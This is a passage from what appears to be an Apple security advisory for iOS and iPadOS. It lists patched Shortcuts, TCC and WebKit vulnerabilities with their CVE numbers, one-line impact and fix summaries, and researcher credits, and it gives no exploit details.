Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A shortcut may be able to use sensitive data with certain actions without prompting the user

Description: The issue was addressed with additional permissions checks.

CVE-2023-27963: Jubaer Alnazi Jabin of TRS Group Of Companies, and Wenchao Li and Xiaolong Bai of Alibaba Group

**TCC**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access user-sensitive data

Description: This issue was addressed by removing the vulnerable code.

CVE-2023-27931: Mickey Jin (@patch1t)

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may bypass Same Origin Policy

Description: This issue was addressed with improved state management.

WebKit Bugzilla: 248615  
CVE-2023-27932: an anonymous researcher

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A website may be able to track sensitive user information

Description: The issue was addressed by removing origin information.

WebKit Bugzilla: 250837  
CVE-2023-27954: an anonymous researcher

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Visiting a malicious website may lead to address bar spoofing

Description: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation.

CVE-2022-46705: Hyeon Park (@tree\_segment) of Team ApplePIE

Entry added May 1, 2023

**WebKit Web Inspector**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A remote attacker may be able to cause unexpected app termination or arbitrary code execution

Description: This issue was addressed with improved state management.

CVE-2023-28201: Dohyun Lee (@l33d0hyun), crixer (@pwning\_me) of SSD Labs

Entry added May 1, 2023

Tag

#apple